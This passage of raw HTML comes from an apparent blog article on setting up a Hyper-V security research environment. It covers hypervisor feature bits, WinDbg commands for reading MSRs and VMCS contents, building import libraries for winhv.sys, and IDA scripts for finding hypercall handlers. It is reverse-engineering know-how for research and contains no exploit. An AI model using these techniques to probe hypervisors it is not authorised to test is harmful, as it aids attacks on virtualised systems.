style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for NPIEP is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 14:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ExtendedGvaRangesForFlushVirtualAddressListAvailable</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 15:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for returning hypercall output via XMM registers is available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 17:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SintPollingModeAvailable</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 18:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">HypercallMsrLockAvailable</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 19:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Use direct synthetic timers</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 20:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for PAT register available for VSM</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 21:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for bndcfgs register available for VSM</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 23:</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for synthetic time unhalted timer available</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor privileges section, which carried out the operation, that caused the VM exit, can be obtained by calculating the value of gs: 0, read the value of the field in the VMCS HOST_GS_BASE or IA32_GS_BASE MSR:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>rdmsr 0xc0000101</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">msr[c0000101] = fffffbdb`a68c2000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then get the value pointed to gs:83a8, and go to the offset 0xd8.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc poi(fffffbdb`a68c2000+0x83a8)+d8</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`000010d8 00003fff 002bb9ff 00000000 ffffe800 .?....+.........</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`000010e8 00000000 00000000 00216560 ffffe800 ........`e!.....</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`000010f8 00000001 00000000 00000000 00000000 ................</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffe800`00001108 002342c0 ffffe800 00000000 00000000 .B#.............</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this case, the VM exit was made from root-partition.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypervisor in each section forms a special page to run hypercall. Its address can be obtained by reading MSR 0x40000001 (HV_X64_MSR_HYPERCALL):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 306px; overflow: hidden; width: 355px;"><img height="306" src="https://lh6.googleusercontent.com/dRfWUivA_du6El3no3uCzeCOJzjaBjngkeHihtuEm-55_wZ2PHElqNIvcp3bNOTo4sBJROWfe8gr1qNO7Pr948Op7mVZrTs6wC0XANv74pIo9UBrIiWZjxwlLDsUP-ViyL3Bp4ZjwUemdCWfIA" style="margin-left: 0px; margin-top: 0px;" width="355" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; overflow: hidden;"><img height="783" src="https://lh4.googleusercontent.com/Vx8peNKv-PjP_YfuzljoM9UEMf7svUp69z4uohN9FvA88rZYYf5Pia-QkQDd_mhtw39uV4di75O7AsN7fwJ7qpfwXVxbiEgHai1_HIMYxjEqA1Ns-yVYU4NtEVsMyzuK7VNevAXEMOBwXKvOsA" style="margin-left: 0px; margin-top: 0px;" width="671" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In order to be able to use the export function winhv.sys\winhvr.sys can either dynamically calculate the addresses of the functions, or to create a lib-file. Consider the second option.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To create a def-file using the output of dumpbin:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">dumpbin /exports winhv.sys</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(Windows Server 2016 and newer uses a winhvr.sys driver in root partition, so the def-file for the driver in the OS is necessary to form it).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To build a 64-bit driver you do not need to make any changes.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After editing the def-file it must be re-form the lib-file with the command (for x86):</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhv.def /OUT:winhv.lib /machine:x86 </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For x64:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lib.exe /def:winhvr.def /OUT:winhvr.lib /machine:x64</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Run Visual studio native tools command prompt before execute this.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can find hypercall table in hvix64.exe using script </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-scripts/blob/master/CreatemVmcallHandlersTable2019.py" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts/blob/master/CreatemVmcallHandlersTable2019.py</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Script creates table like that:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 71.4pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 258px; overflow: hidden; width: 565px;"><img height="258" src="https://lh3.googleusercontent.com/y3rvD_X4KrHv9DTW4i8v-deS7v5q61O6z3QTcN1OCCMvJuCoNupV1oz_fhceG_kSkyBfwQScFHOMFL9_S1QVsaumcIiW6o9VQCkF86jRYOfx6jAKTqEEGWJKkeT5ppRz_Zis89goRXh5rsqvig" style="margin-left: 0px; margin-top: 0px;" width="565" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can display VMCS fields inside hvix64.exe, using script. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-scripts/blob/master/display-vmcs.py" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts/blob/master/display-vmcs.py</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Attach script to hvix64.exe IDA PRO database. It calls procedure</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmread rax, rax</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">jmp -3</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">inside hvix64.exe, read rax value and display it in console.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For comparison, some of the important fields VMCS were obtained using the script display_vmcs.py after VM exit:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 652px; overflow: hidden; width: 561px;"><img height="652" src="https://lh3.googleusercontent.com/DdH1ZQdf-bNtTrVNohvuBGlM4ruQ9A9jjkWBpW7ZNA709-niQdgn4cQMRGn-3hw8_Y_Ep4kctJPnKlUWniI-krYfuK5GtWjFVJKFJixrkabfSidQfFDUXtDRai9DmoEn4Xv8qudNkgL1GcWKRA" style="margin-left: 0px; margin-top: 0px;" width="561" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For instance, you can see, that for guest-partition the hypervisor handles all input/output (I/O exiting Unconditional), and for the root partition monitors only certain ports (Use I/O bitmaps).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!db 0x101001000 L1300</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001000 00 00 00 00 03 00 00 00-00 00 00 00 10 00 00 00 ................</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001010 00 00 00 00 03 00 00 00-00 00 00 00 00 00 00 00 ................</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">……………………………………………………</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001080 00 00 00 00 00 00 00 00-20 00 00 00 00 00 00 00 ........ .......</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">………………………………………………………</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">#101001190 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 f1 ................</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Also you can modified existing Linux integration tools for deep debugging of vmbus:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><a href="https://github.com/LIS" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/LIS</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Conclusion</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The article describes steps, that must be done to create a stand for the Hyper-V research, and briefly describes some aspects of the hypervisor working. I hope, this information will be useful for beginners researcher of security of Microsoft’s hypervisor. Links on tools or open sources utilities I collected on github.com: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-Internals/blob/master/HyperResearchesHistory.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-Internals/blob/master/HyperResearchesHistory.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V internals researches (partition – “Hyper-V related open source utilities, scripts”)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Scripts, mentioned in article, placed on github:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><a href="https://github.com/gerhart01/Hyper-V-scripts" style="text-decoration: none;"><span 